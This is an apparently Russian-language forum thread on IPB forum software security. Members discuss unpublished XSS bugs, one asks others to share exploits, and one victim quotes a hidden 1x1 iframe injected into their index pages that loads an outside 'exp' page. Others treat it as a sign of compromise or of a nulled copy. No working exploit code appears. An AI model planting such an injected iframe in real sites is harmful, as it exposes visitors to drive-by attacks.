Поиск дырок в IPB.

[pomor]

Все в курсе что дырки есть. Все заплатки что найдены на оффициальных стараницах уже поставил. Но я предполагаю, что это все появляется всегда с некоторым запозданием. Предлагаю поделиться експлойтами, не ради хака самого, но ради ну его к черту !

 

[ZAG]

Могу сказать лишь одно...
Последния версия бажная! И во ВСЕХ версиях есть xss-бага

Это какая ? Судя по твоему сообщению ты про 2.2.2 говоришь..
Баги есть во всех версиях, и будут всегда! Просто их находят само собой позже чем выходит сама версия.. Это необратимый процесс ) Весь вопрос в том кто быстрее найдет дыру, атакующий или защищающий

 

[LEE_ROY]

угу, а баги скорее всего уже есть, просто будут сидеть в привате месяцок.. а потом на секлаб скинут, после поимения 90% бажных ипб.. ))

 

[muforum]

# for all - Моё мнение, что все должны понимать, что сама компания, которая разрабатывает IPB, сама же оставляет дыры, так как им же тоже надо, чтобы люди постоянно покупали новые версии...

P.S. -> Если компания разработчиков сделаем всё один раз, то тогда кто будет покупать новые версии а ? =)

 

[punkz]

могу сказать что есть сейчас xss в аяксовом изменение темы... т.е. использовать можно если ты модер на форуме... это на 2.1.х

 

[bratok]

ребята, помогите советом

обнаружил у себя на паре форумов во всех index.html и в index.php такой вот код

<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0 src="http://XXXX.org/exp/index.php"></iframe><!-- ~ -->

как я понял - это сделали через какуето дыру?

1) что это за дыра?
2) как ее закрыть?
3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

всем заранее спасибо

ЗЫ проверьте и ваши ресурсы - наверняка найдете подобное

 

[EvilSven]

>>1) что это за дыра?

это могло быть и не через дыру, а прийти вместе с нуленой версией

>>3) какой максимальный вред от этого кода? (понимаю что все зависит от кода в ифрейме)

открой этот адрес (_ttp://XXXX.org/exp/index.php) и посмотри что там будет. Вполне возможно, что ты просто накручиваешь кому то показы

 

[AdeQuAte]

обнаружил у себя на паре форумов во всех index.html и в index.php такой вот код

Это обсуждается уже давно, дело не в IPB. Подобные фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?

 

[tov_Me]

Это обсуждается уже давно, дело не в IPB. Подобные фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?

Да нет. iframe может служить индикатором взлома, судя по ibresource.ru Встроенный в 2.1.7 антивирь вообще в основном по ифрейму проверяет. А дырку, через которое это могли замутить, проще всего определить по версии форума.

 

[toha]

фреймы появляются в любых скриптах и проcто в HTML страницах. Антвирь молчит?

антивирь тут не показатель к сожалению